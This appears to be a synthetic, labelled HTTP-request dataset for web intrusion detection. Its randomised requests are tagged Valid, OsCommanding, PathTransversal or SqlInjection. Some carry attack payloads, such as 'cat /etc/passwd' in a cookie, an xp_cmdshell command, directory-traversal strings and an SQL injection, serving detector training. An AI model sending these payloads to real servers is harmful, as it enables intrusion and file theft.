Accept-Language: eohza-jnlcTrte, tttkoxar-qma6ee, 5-aC;q=0.9, aey-lda
Cache-Control: no-cache
Client-ip: 237.9.247.14
Cookie: hwbh5whelirodrG=t05uWBp;it83fosoine=265;eti8eoeipn=9652905;e4iEwhoeel=asNtbruhe;tZz4scriptS22dscript=Aptexp_rooN;tepmn;2hen=608
Cookie2: $Version="376"
Date: Sat, 10 Feb 07 14:49:22 GMT
ETag: "9ofb.S_pyX8mvIsUitk6"
Expect: aashide
From: m5h3d@tewicbp3ee.be
If-Modified-Since: Mon, 12 Dec 05 03:52:07 CET
If-Unmodified-Since: Tue, 26 Jul 05 09:57:51 CET
If-Match: "@9DCtMpZKYt7C0CW3"
If-None-Match: "JRZAfMeNWXKrS_21"
If-Range: *
Max-Forwards: 2
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic SEVoY3RjOmFOaGVpaW92
Range: 9797-
Referer: http://poid.ch/sacgt/tejxbb/si6aabik/goeiiec.dll
TE: trailers,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: rpir8oieZTttnr
UA-CPU: MIPS
UA-Disp: 4115,383,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 539x1521
Via: 7.3 239.109.228.106
Transfer-Encoding: uyCn
Upgrade: LqnoEm/4.0, 2Odnr/2.0, ioip/3.7, qMe/8.4
Warning: 456 www.asdhn.gif:2845 "ronln6simQtdh" "Thu, 30 Jul 09 15:57:06 GMT"
X-Forwarded-For: 209.131.51.221
X-Serial-Number: 86831
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 2123
Start - Id: 43646
class: OsCommanding
PUT /xntmozobR6tyr3tzihi/etn/rfatne/1imgm5/MIinputrxX/o5xwO@mR1Nu2RPZIlkM.cgi? HTTP/1.1
Content-Length: 284
Content-Language: eTlsidn,pxatlcoF
Content-Encoding: deflate
Content-Location: http://www.eastTed.it/ebneaaq/zogsweee/ealktlh/ohrmApe3.nsf
Content-MD5: OHNzZHQ1dWVhbzFhRWxteg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Aug 07 15:05:21 CET
Last-Modified: Tue, 13 Nov 07 16:35:32 UTC
Host: www.iaNefanenn.it
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-5;q=0.6, windows-874;q=0.9, iso-8859-7;q=0.0, utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 43.7.143.107
Cookie: nAsoeuqv4nrtM=cat    /etc/passwd    |;TltfhfYSn9sm=7
Cookie2: $Version="912"
Date: Sat, 07 Oct 06 07:31:48 UTC
ETag: "a@mY_KbfI9G.BUkGz"
Expect: Et9gxx
From: stteA4ju@2lnVxdh.ch
If-Modified-Since: Mon, 14 Nov 05 13:42:49 GMT
If-Unmodified-Since: Mon, 22 Feb 10 17:51:12 GMT
If-Match: "Wg5oB7ZVkbOBSXWgmvre"
If-None-Match: "Oi2dEn0ki-lAwVcx"
If-Range: *
Max-Forwards: 20
MIME-Version: 8.3
Pragma: cdo='oa'
Proxy-Authorization: Basic eXdDNnphOmxoZHJoRWU3
Authorization: smg8 meceh=ra7cmhr
Range: 0815-153
Referer: http://www.uAlad.it/goySRon/eanfahea/1ypdaoha/cnnkhs0/sirn3.dll
TE: trailers,deflate
User-Agent: Dcslfle4atawfdtj
UA-CPU: Sparc
UA-Disp: 506,420,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 113x460
Via: 7.3 www.l9ee.png:4
Transfer-Encoding: deflate
Upgrade: ruakde/7.8
X-Forwarded-For: 208.155.78.73
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

htiStahemtAD=65724&3ihdgaIrny9=f0EsVOX-q&buCSK_mIbOkX=oo8icsEu&RnrT=a1heosftw&6unionVKwnullNQP@=Aors&aottezdnoego=dNQfB&ouseqoh=88767803&eoeEto2otoitc=oeojEeht0uroqdS&ogse6wr=(d<qarbgsound2tmp&Fzayd=;th?b\ srerservices&-Fiunionu2TLf.=oinputtre&sotcbca2a4w=9671125&m4=Vfibs1r

End - Id: 43646
Start - Id: 36055
class: PathTransversal
GET /2_7fstdinWF8_UFt/27beSnS0ae3e/Jgand47/kF-8KGmz@GNiKK/Tc4ens/ts1oahwElenes/iFIh/mYnaknlznt5uee1mqw/9oBlt_beJAFuzAK.aspx?mnBmMZg3=03170647&eUaWowindow.opent.k=iwed+&vEA-=n%25saabT&sly8epcnona=346873&aAteten=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fsi%2Fge%2Fic%2Flintatrise.php&smcuwbersynos5g=tjunion%29rx5nger&lhrcm=shshi&hsfea7oe=cmdsrio63div0te&esB=iooad&rueo=921 HTTP/1.1
Host: 63.116.66.146:80
Connection: close
Accept: video/mpeg;q=0.2, text/xml
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: max-age=496
Client-ip: 158.196.17.85
Cookie: anreEmnBi=sK9jACM;eYsl=iaccept;tiaRahhlA3llma=e7.;U6NC8tmp0x2Q5=|echo5I rlikeqgroup bynj h%ed;ztdcov=3;iRml=a1Ji8QUR
Cookie2: $Version="12"
Date: Mon, 23 Jun 08 15:29:26 UTC
ETag: W/"uHw4nlcHQ8W74qHyy"
Expect: xtndar=lamlcest
From: Odatte@nazuaen.net
If-Modified-Since: Fri, 09 Jun 06 04:35:55 GMT
If-Unmodified-Since: Tue, 27 Oct 09 15:27:39 UTC
If-Match: *
If-None-Match: *
If-Range: "a9tDZTJhOb2dAVvPjTOa"
Max-Forwards: 254
MIME-Version: 5.0
Pragma: i2=ofwNaD2e
Proxy-Authorization: Basic YndzbHRvOmVuRWZodHM=
Authorization: sesr dyand1=Ihe1t
Range: -676,1810-88717,49-
Referer: /Ntdi1eq/emyO/zize2/llnc7ire/Aeoc.htm
TE: gzip
Trailer: Warning
User-Agent: 4hgodtnSdROr2h9h2QAy
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 2.3 8.9.78.53:22, HTTP/0.0 252.195.190.33
Transfer-Encoding: eare
Upgrade: ia1tsT/0.5, s0tear/3.3, emk/4.1, teba/2.1, nt5/9.5
Warning: 919 47.112.49.170 "uvicSPonns9rssR" 
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36055
Start - Id: 36412
class: OsCommanding
GET /Qef4alEEhwtdOe/eTnaelxsnrqn/lTetctOxvFx/oERoti/tnPtas.pl?i9reWafBfue=66859&aiuQ=xHP&1zqC-p@sa0S6=winntmdeleten7%27aoptp&abhvd7rltHRnePn=stl&eb9ti5h14DIy=88&tdtreeyaso67l3r=34160&7pmi1eehf=832535&snesve5fxseeDe=sjx6-%40Ep&agtotos=rzzPUTWKhUs&eijih=exec++xp_cmdshell+++++%27%22BcUqecj%22+++++%3E%3E++++script.vbs%27&ziae8NgeEh=eEatedvhnasu HTTP/1.1
Host: 118.212.27.151
Connection: close
Accept: */*;q=0.5
Accept-Charset: macintosh, windows-1255, windows-1255
Accept-Encoding: 
Accept-Language: t-5go;q=0.3
Cache-Control: no-transform
Client-ip: 133.214.196.239
Cookie: t3rtd9=stKIuvxI
Cookie2: $Version="16"
Date: Sun, 12 Jul 09 03:52:12 GMT
ETag: "3oiVqHGZpfVG5NuenSG"
Expect: 100-continue
If-Modified-Since: Sun, 23 May 04 21:56:53 CET
If-Unmodified-Since: Thu, 29 Apr 04 10:22:49 CET
If-Match: "uf@5i@C4Nvt3msDFd7y"
If-None-Match: "fSPHXRMjPU.XynlmrRPs"
If-Range: *
Max-Forwards: 674
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM bmlvMHVsbHB0bGNvbGF0aW5XYmphZW5MYXNvdGlvRXJBaGd3NGVmZ20=
Authorization: oadi wa4vrgfs=fietzjqd
Range: 15-,7348-823
Referer: http://www.eiaIgi7E.fr/wye2ihd/eadnl/mhtvli/lcr8aMnZ/uaasop.php4
TE: trailers,gzip;q=0.7
Trailer: From
User-Agent: Mozilla/9.8 (Windows; U; WinNT 8.6; ae-qO; rv:4.3.8) Gecko/96856628
UA-CPU: PowerPC
UA-Color: color16
UA-Pixels: 811x0670
Via: HTTP/5.2 131.19.139.57:0220, 8.3 www.reae.jpeg
Transfer-Encoding: deflate
Upgrade: ehax/0.1, twoX/5.2, amhin/1.7, Nyuis8/4.4, rta/1.3
Warning: 271 125.50.84.12 "ieans4Sb3nfr1aNeeTba" "Fri, 16 Dec 05 02:23:13 UTC"
X-Serial-Number: 3132284615
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36412
Start - Id: 12892
class: Valid
GET /thS/emEy/f-KBb5H8S/oto7aetreeuu5eE/bjv/izleh/bh6ebeaeaoealhwdtr/aez6mvWpSlSjNvL/7uAJddati5teEDeatld.jsp?tahDro=%2Fkatzshy&NvNimgZ@=boot.inis&5it=4228544&acceptK9Xnmetazf-G=37&9s=4590563&eriaiikot=slHrmq%3Etc&haeisOeje=cmdli%28a&PlshT2qw25=st1rt9ev%24&Gedei6l=Neea9Rjacqetooi&otaaAhltecaSnha=+fs%25nS&ebortoausvhhszP=52994 HTTP/1.1
Host: 149.84.121.45:80
Connection: d9wd
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 50.12.150.32
Cookie: tt1TeeauedhnM=323
Cookie2: $Version="3"
Date: Tue, 03 Mar 09 21:00:18 CET
ETag: "N9kmnIoFFWVpCScxP@"
Expect: 100-continue
From: ngeagi8r@t1t7.com
If-Modified-Since: Mon, 12 Apr 04 12:13:40 UTC
If-Unmodified-Since: Mon, 20 Mar 06 12:59:01 CET
If-Match: "3-Ee7APe7cu6lWmx1"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic ZWhlOHBhYmk6b29tM29l
Authorization: Digest nc=2d9e904E
Range: 976-,-97584
Referer: http://www.ottlnpo.de/phet7u/eguael/3nrs/ltsttt.php4
TE: deflate
Trailer: If-Match
User-Agent: Mozilla/7.3 (X11; U; SunOS sun4u 9.0; Ei-at; rv:3.4.8) Gecko/55754309
UA-CPU: StrongARM
UA-Disp: 769,338,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 253x5878
Via: HTTP/4.4 www.ao1n9.html:659, 8.3 124.3.255.113:3
Transfer-Encoding: gzip
Upgrade: ioeah/7.8, nuq/3.5, nnm/0.8
Warning: 657 108.119.89.134 "n3Eimiaj3lnutimDg" 
X-Forwarded-For: 216.6.120.104
X-Serial-Number: 4907746729509688
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12892
Start - Id: 14630
class: Valid
GET /c3QfT3SO3XlP_9dGqru/rqfyd-nH5/pobjectNR5t8Mro/tssaolneca3loienozj/AKQG8G/tyata/WkgnrEz8J5x/afa5rr.asmx?soMaxaat=263021&G@ETLzCsLGt=saevalftps&omeoadtDe=97851&mdf8=421939&servicesPQr80optg-.8=25380185&ynthmtes2ivenhe=dE2ur62RIt5&tlef5b=Fsehaobkmeuua&ABcmdtzCv=rn+p&lvOakmvhttpsl8=936648109&sEetArnwsr7ers=apassthruy6meaccess_logiug&tfhx=62366615&input-MmaXnsh=vir&S1eaee2t2so=Aqb3he+s&h1e3ics0nr3eiZ=c2oa&ef=ann74u%2Frlogrsnmetaj HTTP/1.1
Host: www.0tejns.st:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-7, utf-8, windows-1251, iso-8859-3;q=0.2, iso-2022-kr
Accept-Encoding: identity;q=0.4, deflate;q=0.0, compress;q=0.8, identity;q=0.1, identity
Accept-Language: dT-49;q=0.1
Cache-Control: no-cache
Client-ip: 156.184.215.2
Cookie: dLatni0itdi=2eGEtj7nieQA;2ugesElbs7nwsbm=Se5hb;.URkbMQ3lBnaccept=e4uuI1aVjOT;snatewt=09
Cookie2: $Version="1"
Date: Wed, 31 Jan 07 19:45:35 CET
ETag: "x6eT1qHW17aeJ4b"
Expect: tucnnil5
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Sun, 02 Mar 08 21:25:11 CET
If-Unmodified-Since: Wed, 08 Apr 09 22:59:04 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 3.5
Pragma: iGqrs9n2='t'
Proxy-Authorization: Digest nc=Abd7c6e4
Authorization: Basic b3psdG52Om5jc2c=
Range: 0756-,590-560,-399
Referer: http://www.0ftH.uk/c1b8F03h/hrOsqoai.dll
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: nehdjenu (szsdnAnBX; iB@cLLUJ)
UA-CPU: MIPS
UA-Disp: 1652,237,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 518x165
Via: oiuds/3.9 13.181.77.136, hehec/0.7 www.ttGnnm.tiff:74, FTP/4.5 176.40.198.92:01
Transfer-Encoding: 5eOdx; 2sqc=ajjw
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
Warning: 713 www.sdys.jpeg:780 "dc7ns" 
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 5263327282
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14630
Start - Id: 41551
class: SqlInjection
GET /cpgtOde2At3ttomlwlen/objectckKV7R0_3pkB2x/nrO6hrtgrserohdeE/-Ja8P-lib7H@lL.aspx?or30lnDibetlEaa=tygw5CRs2tx&mpli=nzoiTisitkPtn&zElocationN@=81&sPVs5Y=node%29e%5Cinu%7Estdin%7Ci%26h%26&nuetfi65tal5=%27+++++%2F**%2F+++OR++%2F**%2F+%27wtederEt%27+%3E++%27S&ocHttcR=058656&Y6s1oiii=t+jt%5Cpysamg%7Cr+riE&dcwdIEgrOruek=shutdown%26egai&nxj7a8n=956637047&Ueereaoeeecoyae=sUne%25tmochaoe6np HTTP/1.1
Host: www.ioYqolEec3.biz
Connection: close
Accept: */*
Accept-Charset: windows-1251, iso-8859-2;q=0.2, windows-1257
Accept-Language: *
Expect: vnri
If-Range: *
Referer: /rbeein/9ja9/waazthft/be6ug/ns6paaa.sh
User-Agent: jetta6/0.2.0
Via: owe9n/7.7 www.iaeatwci.htm

null

End - Id: 41551
Start - Id: 17973
class: Valid
GET /rlNsrowe4iaEaaete5/IphpWS084ore6ijp5/binM0gcltaeFinsertiJPz/dtE/rt6leyld/ryb4a/lWfIK/j3lPX5-r@u8nL/0D/iINJLr8jOZ1KJXk/U30RzOaJ/ederldeDbaar.tiff?eum3eyhuthsea=BhdBrttn3nmlitsy&camneeanafetaau=loix&VoC9YKaL10mH=etc%7Einputr%25wso&rtnPisas=cr%26s&niRnmbe0e=523652683&ifeedahrrrbx=nztirsleape&caes=72599&Hvobe2=688&ahjedsaeau=iqhh7c&Nnwcxp_=Kiernn&1rI=eybtoos7xnatr HTTP/1.1
Host: 232.226.14.91:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 7-n5ixcno, 0utgepw-Tcda, haiI-ovE;q=0.4
Cache-Control: max-stale=03
Client-ip: 60.116.122.177
Cookie: ehAnsEnmjrie5=85810228;Zh8BgYGtmpfm17=468;5nea=ntXm9FpKM;mandlajRatem3=289429205;Gtycr=skl;suyl1eae=8le3hsw
Cookie2: $Version="2"
Date: Thu, 31 Aug 06 02:58:56 GMT
ETag: W/"6krBGQ9wdb0UZND_kb@"
Expect: aereoiar=ndite
From: 3lhked@reen2i5.fr
If-Modified-Since: Fri, 27 Feb 09 09:51:45 CET
If-Unmodified-Since: Tue, 26 Aug 08 21:02:47 CET
If-Match: *
If-None-Match: "IcuCV8BOtjqtgKiL5fw"
If-Range: Sun, 17 Oct 04 08:52:53 GMT
Max-Forwards: 7200
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: cirE tad6e1h=mHpc
Authorization: Basic MHVybml0Om5vbW9lNHI=
Range: 8-
Referer: http://www.de6a.ch/ecs4i/C7ajeeIs/xrace.php
TE: trailers,trailers,deflate
Trailer: Via
User-Agent: bUDB_k.E http://www.dinoqa.be
UA-CPU: Sparc
UA-Disp: 5395,1752,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5744x7610
Via: nonk/4.3 79.65.141.17, 2.0 243.250.111.198, 7.8 131.21.179.70
Transfer-Encoding: compress
Upgrade: d1n/9.1, lilPin/5.5, xYN/4.8, yeNdly/0.6
Warning: 243 www.t3moNn4.shtml:671 "6wh40ksieyhlBiAly" "Thu, 09 Oct 08 24:43:53 CET"
X-Forwarded-For: 52.173.140.208
X-Serial-Number: 16119132
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17973
Start - Id: 30164
class: Valid
GET /iay/htaot/esJLT/dnlaeregem2re7/rd8x6yWWJC/oeERjwbail/jtpGGYqAfN7xWPe5/BMaXL%ux%ubjB/t3Htoro/prbORiHbE/PQtPLfhOn9F/aDGGWWJt@SOR-NglO.swf? HTTP/1.0
Host: www.6ullex.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=02192
Client-ip: 70.123.209.51
Cookie: g1nbU=n09c9T;pos=v1pteubf4;hbabaaf=eiapysiooa
Cookie2: $Version="3"
Date: Mon, 21 Apr 08 13:44:46 CET
ETag: W/"pr0i4i.LL-1_lA2GuCkx"
Expect: 100-continue
From: i4siaaa@hedct.com
If-Modified-Since: Fri, 14 Dec 07 09:13:46 UTC
If-Unmodified-Since: Fri, 26 Jan 07 07:44:04 UTC
If-Match: *
If-None-Match: ".SnnjMwPVJ5zuIY_"
If-Range: "3OoicjSUt7sXG6KGEd"
Max-Forwards: 0548
MIME-Version: 6.5
Pragma: Eirnbvar=asW
Proxy-Authorization: Digest opaque="nhmycNt"
Authorization: NTLM amNORGFsaXREbmUzaWVjcTRpc3JubWFyc2liRGR0OGV1aFVpZUVoRzBVRWViZQ==
Range: -34133,03222-,1414-
Referer: /oatc5qe/lsccNet.msf
TE: gzip,gzip
Trailer: Upgrade
User-Agent: ircofev
UA-CPU: Sparc
UA-Disp: 9773,678,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: 3.2 www.oAuoti.gif, 1.4 www.hetcmr.jpg:01, 9.0 www.jdsr.jpeg
Transfer-Encoding: compress
Upgrade: lk6a5e/0.8, Agoqga/0.6, lnr6p/2.4, wsi/3.9
Warning: 169 145.87.255.238 "bhcawmncs4" "Fri, 12 Jan 07 03:02:59 UTC"
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 89792180313370597
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30164
Start - Id: 3552
class: Valid
GET /M2emalLhooVoe/wht9evrnosk/5t1kIemu/eNswWvVJIw4L-TjGi/bBwlh1OVyXhnvH/n-B/iH.jpg?zeeReo0e8eng=ban&asslgiivgf=roi4aopttne+%26&zasdtenuntc=z%5Cc HTTP/1.1
Host: www.nzOzsS.it
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-10646-ucs-2, x-mac-turkish;q=0.7, iso-8859-1, iso-8859-8;q=0.8, windows-1255
Accept-Encoding: *;q=0.5
Accept-Language: mnv-ove;q=0.3, dasvur-asd5kwMl, de0Ee-tcenhvVo
Cache-Control: Toih='oea8e'
Client-ip: 158.1.19.6
Cookie: u4m=nNVaservicesrqg
Cookie2: $Version="626"
Date: Mon, 09 Jul 07 05:36:29 UTC
ETag: "SB9beLAXh_TSR9h5-qU"
Expect: mnohbxus=wTEskEba;ndeu
From: en6o@GjeessSofa.org
If-Modified-Since: Wed, 05 Nov 08 05:02:20 CET
If-Unmodified-Since: Sat, 04 Mar 06 13:00:29 GMT
If-Match: *
If-None-Match: "UM8qsMjbz4MIgeoYrHiG"
If-Range: *
Max-Forwards: 328
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: gu9n tahhnbsr=mhYueol
Authorization: NTLM eWhlRWdpMzZ5VE50MWFyaWNsbGlkZTZob2tobmljb3llcm9kQjM=
Range: -6441,532139-93,33703-4
Referer: /2yoaozqo/mgzM2qeV/Nueltg/1AwO.sh
TE: trailers
Trailer: Date
User-Agent: Mozilla/3.2 (Windows; U; Win 9x 5.0; wE-iv; rv:8.1.4) Gecko/75363919
UA-CPU: MIPS
UA-Disp: 0012,4574,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 162x0756
Via: HTTP/0.3 180.90.173.213, HTTP/0.7 www.anemu.css
Transfer-Encoding: deflate
Upgrade: ayed/3.7
Warning: 342 233.167.105.67 "eneoshetbsundot" 
X-Forwarded-For: 63.217.151.16
X-Serial-Number: 0103984813938980
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3552
Start - Id: 1431
class: Valid
GET /fwJsystemln-DVNIexec/ume_9y@FA/nijnwdXs_MI.php3?andme4rL1n2I1b=usystemahRinclude&to2ilNOhr8dib5b=769361&m9Ilxw=816343&etdcon4trarmsW=T%5Cls4vie2oinputacceptnyDfebgsoundn&liuurcis5s=796584&tXlIrExipffl8l=79726&1c=7606970067 HTTP/1.0
Host: 185.184.148.143
Connection: keep-alive
Accept: image/png;q=0.8, image/*, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 151.208.70.36
Cookie: eoamkhn4s9Ciatb=enUi2cA0hcux;nEN=269106595;mint=epm6VshH6nn;oeorsw=ewrb9
Cookie2: $Version="559"
Date: Thu, 04 Aug 05 23:57:56 GMT
ETag: "VZWpwdhLnZHVFq@U4"
Expect: OecLan=eblo9urf
From: etps@nerI.uk
If-Modified-Since: Sat, 11 Feb 06 21:38:30 UTC
If-Unmodified-Since: Thu, 26 Oct 06 17:01:40 CET
If-Match: *
If-None-Match: "4BLnBKK0Qz-5.T5"
If-Range: Sat, 28 Feb 04 03:01:17 CET
Max-Forwards: 829
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic aXNlZWFGOmFnc3M=
Authorization: Basic em5yMjlyOTpudHR1SQ==
Range: 6-15763,0058-47
Referer: /lgoitezb/yyIktgnA.asp
TE: chunked;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: trXqCtCj http://www.hqrsi.be
UA-CPU: x86
UA-Disp: 592,845,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 226x4570
Via: 0rToYx/2.5 www.Educsa.tiff, 3.2 www.aHxto.htm
Transfer-Encoding: identity
Upgrade: rrN/0.8, eAoam/3.3, Ipeo/1.1
Warning: 674 176.177.145.209 "w8sNts" 
X-Forwarded-For: 112.212.64.188
X-Serial-Number: 1347008
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 1431
Start - Id: 3155
class: Valid
GET /aW1.YIBORgEqHIsAz/9LIiSK5i/TRlu0setewuItms/yis/eisue0/lnqtoargrNe/lrh/etoa/enienIn/dobev/caGl_j..W.html?eeEmpea=23759&5Lyiorr=1r9Tiha5aelmaih&easoacobstw=yx6t-L%24mfl%2Baei95px&cae=92364873&tznaoywenhdu=d2w%7Cporh&ecilTt4clssuse=tet&xueeqek=ao%7E%5Dnsjdetc48&G86OJtnetcat=0%7Ee6c&4DDMFlocationW6=%27&Rwat=ihmail&aehpo=36&tpiernVPii0hYt=mtS3ji&bnStirneo9hnrt=3%3Daodat&i5ecr5e9e83b=Pnsnm-YUobin%7Ce HTTP/1.1
Host: www.we53.org
Connection: weets
Accept: application/zip, video/quicktime;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.1, gzip;q=0.1, compress;q=0.2, deflate
Accept-Language: B-thib79, oqfoslc-si19JSr;q=0.6, xgsOn-aa
Cache-Control: 1lxen='n'
Client-ip: 99.163.158.104
Cookie: s5c9itmkll1ne=45923310;JTsXK=g3eyei0to3ohli9ie9;otl9orldUeuio=s1rra;rsgwplhi=0I-ZtGWY;cf8iHer=292896;ddp8ettev6t=08i$adP5rmunionorit
Cookie2: $Version="69"
Date: Wed, 30 Jan 08 20:31:32 GMT
ETag: W/"wNg_fjKSBvhTnSzuv"
Expect: 100-continue
From: 6jethpt@ukvalodoo.net
If-Modified-Since: Tue, 13 Jul 04 20:40:25 GMT
If-Unmodified-Since: Sat, 08 Jul 06 21:16:56 GMT
If-Match: *
If-None-Match: "jBguDrzAI4G8KUb9Df9O"
If-Range: *
Max-Forwards: 6
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic ZWl2bDpsdElobkhj
Authorization: Digest realm
Range: -82153
Referer: /ene0gi/aUj1e.cgi
TE: deflate,gzip;q=0.4
Trailer: If-Match
User-Agent: dntfgw (tv7w2JWI0i; pocEQOYeAR; efYKYHWueu; eLSTrH; e5DH4rs)
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5717x5114
Via: FTP/5.2 55.190.207.217, 9.0 www.aligscto.gif
Transfer-Encoding: deflate
Upgrade: ianerr/8.5
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 227.104.147.72
X-Serial-Number: 37153368506514
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3155
Start - Id: 44884
class: PathTransversal
GET /oe94m0/eWINpn-FMk.moQ2.htm?metaqU3U18hqUCy=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&RMn-cGA_1U=jxSBwM%40&Su8L=5029816882 HTTP/1.0
Host: 213.62.233.225
Connection: close
Accept: video/quicktime;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale=89146
Client-ip: 28.173.55.36
Cookie: b5nss=CAqa;Fntat5wnTb=102;ehhWsaEsdpzhSn=83;sicclqtnt5dct=Ex;2dedetVeL0htHo=caU6tesgytea
Cookie2: $Version="72"
Date: Mon, 03 Oct 05 03:04:19 CET
ETag: "Fg6uxv@CUmKOi65"
Expect: 100-continue
From: lalrk0d@mOge.gov
If-Modified-Since: Mon, 12 Dec 05 01:51:55 UTC
If-Unmodified-Since: Wed, 16 Jun 04 21:04:10 CET
If-Match: "WBL@5hL_Hit7g2QoC.p"
If-None-Match: *
If-Range: *
Max-Forwards: 73
MIME-Version: 2.7
Pragma: nE=R3r
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: NTLM YWZlc05jbm03aHRhY290bDVpdGtlaW04OGVlMHVhaWRidmFUb2lybnc1TGU=
Range: -41,56231-,-8575
Referer: /dios/ht7sns/ttca/eDes.jpeg
TE: trailers
Trailer: Expect
User-Agent: sLh8/7.8.3
UA-CPU: StrongARM
UA-Disp: 229,303,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 134x0521
Via: lZ2b/2.7 www.nWlgw.css, 3.0 www.en1t.jpeg, HTTP/2.0 www.TgtoeoUT.css:0
Transfer-Encoding: identity
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44884
Start - Id: 18448
class: Valid
GET /oT@_H05xT8diJ9HG2Abo/lXZ-LqEw5/likeRs1link@Wu/ftnaeeeHratWi1ae.bin?systemcoEPhI3NdHd=bDS&cqcyorw0e0be=50&sy3x=7between%2F&olIpqntae=42&otherk=naROua%28wnhenl&dOhmloa5se=991857&sira=57757416 HTTP/1.0
Host: www.lSaol.biz
Connection: keep-alive
Accept: audio/*, text/xml;q=0.7, text/plain
Accept-Charset: cp-932;q=0.3, x-mac-chinesesimp;q=0.8, iso-8859-4, cp-936
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.9
Cache-Control: min-fresh=270
Client-ip: 191.22.191.245
Cookie: kh=h2BeB5;teSw=iKW4mj6;tw=IAainijtaiemth;wTeer=l  x ghonttRen;lseatueeuenc8=tqe
Cookie2: $Version="3"
Date: Wed, 03 Oct 07 10:17:29 CET
ETag: W/"snEdmJJIaW@HvFAx2-"
Expect: w6ae
From: bleeld@bya2eNde.it
If-Modified-Since: Fri, 07 Oct 05 08:37:16 CET
If-Unmodified-Since: Tue, 06 Oct 09 14:00:19 GMT
If-Match: "udENU78tBQQE94-pa"
If-None-Match: *
If-Range: *
Max-Forwards: 0428
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: mdtspE NmaFtM=lagctp
Authorization: Basic YWVhdTZlOnNiZmV1
Range: 4-11,-84925,438-
Referer: http://L1siteOe.uk/Aeo6/rtle5i/7ferA.swf
TE: trailers,trailers,chunked;q=0.1
Trailer: Via
User-Agent: Mozilla/7.9 (Machintosh; U; Mac OS X 8.1; es-nk; rv:9.5.7) Gecko/71754420
UA-CPU: PowerPC
UA-Disp: 3029,548,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2749x0541
Via: HTTP/6.3 238.204.245.234, 1.9 www.mywlfqil.html, 8.4 www.1hreQ.jpeg
Transfer-Encoding: gzip
Upgrade: emlqe/4.7, 0ijpy/5.5, 2ee/6.9
